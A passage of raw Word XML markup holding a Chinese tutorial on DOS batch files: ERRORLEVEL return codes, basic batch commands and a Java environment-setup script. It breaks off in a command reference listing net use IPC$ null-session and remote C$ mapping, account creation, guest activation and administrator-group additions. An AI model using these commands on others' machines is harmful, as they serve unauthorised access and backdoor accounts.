      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>成功拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果文件拷贝成功，屏幕就会显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>成功拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，否则就会显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件拷贝失败</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      IF ERRORLEVEL </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>是用来测试它的上一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令的返回值的，注意只是上一个命令的返回值，而且返回值必须依照从大到小次序顺序判断。因此下面的批处理文件是错误的：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      @ECHO OFF</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      XCOPY C:\AUTOEXEC.BAT D:\</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      CHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>成功拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      IF ERRORLEVEL 1 ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>未找到拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      IF ERRORLEVEL 2 ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中止拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      IF ERRORLEVEL 3 ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>预置错误阻止文件拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      IF ERRORLEVEL 4 ECHO </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>拷贝过程中写盘错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>无论拷贝是否成功，后面的：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>未找到拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中止拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>预置错误阻止文件拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>拷贝过程中写盘错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>都将显示出来。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>以下就是几个常用命令的返回值及其代表的意义：</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      backup</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>备份成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>未找到备份文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>文件共享冲突阻止备份完成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户用</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中止备份</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>由于致命的错误使备份操作中止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      diskcomp</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘比较相同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘比较不同</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中止比较操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>由于致命的错误使比较操作中止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>预置错误中止比较</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      diskcopy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>盘拷贝操作成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>非致命盘读</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>写错</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结束拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>因致命的处理错误使盘拷贝中止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>预置错误阻止拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      format</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>格式化成功</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中止格式化处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>因致命的处理错误使格式化中止</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>在提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“proceed with format(y/n)?”</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>下用户键入</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>结束</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      xcopy</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>成功拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>未找到拷贝文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>ctrl-c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>中止拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>预置错误阻止文件拷贝操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">      5 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>拷贝过程中写盘错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>=============================================================</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@echo off    //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不显示</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>Setlocal         //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>环境改变只适用于这个文件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>%OS%       //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为当前的操作系统。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>Rem              //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>注释一行文本。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">Goto </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>标签</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>改变执行顺序，去标签位置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：标签</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">           //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>定义一个标签。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变量名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>值</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>定义变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t>Not         //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>取反</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>Netstat –na   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>显示当前被点用的端口</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>%0  %1  %2  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用于表示批处理文件的参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>为命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>共</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1-9</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>个参数。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>Shift                     //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用于向前一个参数，原</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，原</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>变</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>每调用一次</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>shift</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>向前一移动一位。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>Call               //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>调用其他批处理文件或命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">Start </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>指示出在另一个窗口中开始运行命令。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>=============================================================</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">:: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>这段批处理程序可以自动设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@echo off</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>IF EXIST %1\bin\java.exe (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">rem </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如输入正确的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Java2SDK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>安装目录，开始设置环境变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@setx JAVA_HOME %1</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@setx path %path%;%JAVA_HOME%\bin</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@setx classpath %classpath%;.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@setx classpath %classpath%;%JAVA_HOME%\lib\tools.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@setx classpath %classpath%;%JAVA_HOME%\lib\dt.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@setx classpath %classpath%;%JAVA_HOME%\jre\lib\rt.jar</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@echo on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">@echo Java 2 SDK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>环境参数设置完毕，正常退出。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>) ELSE (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>IF "%1"=="" (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">rem </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如没有提供安装目录，提示之后退出</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@echo on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">@echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>没有提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Java2SDK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的安装目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不做任何设置，现在退出环境变量设置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>) ELSE (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">rem </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>如果提供非空的安装目录但没有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>bin\java.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>，则指定的目录为错误的目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>@echo on</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">@echo </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>非法的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> Java2SDK </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的安装目录</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>不做任何设置，现在退出环境变量设置。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>dos</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>命令参考</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>~~~</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net use \\ip\ipc$ " " /user:" "  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建立</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>空链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>net use \\ip\ipc$ "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>" /user:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">"  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建立</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>非空链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t>net use h: \\ip\c$ "</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>密码</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>" /user:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">"  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>直接登陆后映射对方</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：到本地为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>H:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">net use h: \\ip\c$  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>登陆后映射对方</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>：到本地为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>H:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net use \\ip\ipc$ /del  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>IPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>链接</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net use h: /del  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>删除映射对方到本地的为</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>H:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>的映射</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">用户名　密码　</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">/add  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>建立用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net user guest /active:yes  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>激活</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>guest</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net user  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看有哪些用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net user </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>帐户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>查看帐户的属性</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:br/>
        <w:t xml:space="preserve">net localgroup administrators </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t xml:space="preserve"> /add  </w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>把</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00D84D5E">
